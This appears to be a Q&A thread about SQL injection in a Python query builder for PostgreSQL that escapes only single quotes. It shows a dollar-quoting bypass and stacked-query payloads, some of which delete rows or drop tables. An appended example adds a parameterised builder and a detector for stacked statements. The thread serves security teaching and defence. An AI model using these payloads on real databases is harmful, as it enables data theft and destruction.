
How to exploit Python code escape string for SQLInjection in PostgreSQL

Is there any way to exploit this code:

course = course.replace('\'', '\\\'')
query = "SELECT * FROM student WHERE cost_per_unit > {}".format(course)

to create a query like:
SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student WHERE column = 'ABC'

Here, Python throws a syntax error:

Syntax error at or near "\":
column = \'ABC\'

The replace() method in Python replaces that. Is there any work-around so I can somehow inject something?

SOLUTION

Since I have to compare strings, and I cannot use ' because the replace() messes it up, I used $ dollar quoting.

So the course looked like: 3; SELECT * FROM student WHERE column = $$ABC$$

If course is "3; SELECT * FROM student WHERE column = 'ABC'" I don't get any syntax errors, but the result might not work as valid SQL:

>>> def a(course):
...     course = course.replace('\'', '\\\'')
...     query = "SELECT * FROM student WHERE cost_per_unit > {}".format(course)
...     return query
...
>>> a("3; SELECT * FROM student WHERE column = 'ABC'")
"SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student WHERE column = \\'ABC\\'"

But the code is indeed very exploitable if other queries are possible. For example, this would work just fine:

>>> a("3; SELECT * FROM student")
'SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student'

And so would these dangerous ones:

>>> a("3; DELETE FROM student")
'SELECT * FROM student WHERE cost_per_unit > 3; DELETE FROM student'
>>> a("DROP TABLE student")
'SELECT * FROM student WHERE cost_per_unit > DROP TABLE student'
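Added example (not code from the question or the answer above): the original builder next to a hardened one that validates the type and hands the value to the driver as a bound parameter, plus a statement counter a defender can run over logged query text to spot stacked statements even when the payload hides quotes inside a $$...$$ literal. The `%s` placeholder follows psycopg2's convention; no database connection is assumed.

```python
import re
from decimal import Decimal, InvalidOperation


def build_query_vulnerable(course: str) -> str:
    # Same pattern as the question. Escaping quotes is pointless here: the value
    # lands in a numeric context, so no quote is needed to break out of it.
    course = course.replace("'", "\\'")
    return "SELECT * FROM student WHERE cost_per_unit > {}".format(course)


def build_query_safe(course) -> tuple:
    # Hardened form: reject anything that is not numeric, then pass the value as a
    # bound parameter. The SQL text is a constant and never contains user input.
    try:
        value = Decimal(str(course))
    except InvalidOperation:
        raise ValueError("cost_per_unit must be numeric") from None
    return "SELECT * FROM student WHERE cost_per_unit > %s", (value,)


def rejects(course) -> bool:
    # Helper for checks: True when the safe builder refuses the input.
    try:
        build_query_safe(course)
    except ValueError:
        return True
    return False


_DOLLAR_TAG = re.compile(r"\$[A-Za-z_]*\$")  # $$ or $tag$ (PostgreSQL dollar quoting)


def statement_count(sql: str) -> int:
    # Count top-level statements, ignoring ';' inside '...' and $tag$...$tag$ literals.
    # A builder like the ones above should only ever produce a count of 1.
    count, i, n = 1, 0, len(sql)
    while i < n:
        ch = sql[i]
        if ch == "'":  # standard string literal; '' is an escaped quote inside it
            i += 1
            while i < n:
                if sql[i] == "'":
                    if i + 1 < n and sql[i + 1] == "'":
                        i += 2
                        continue
                    break
                i += 1
        elif ch == "$":
            m = _DOLLAR_TAG.match(sql, i)
            if m:  # skip to the matching closing tag (or to the end if unterminated)
                end = sql.find(m.group(0), m.end())
                i = n if end < 0 else end + len(m.group(0)) - 1
        elif ch == ";" and sql[i + 1:].strip():
            count += 1
        i += 1
    return count
```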
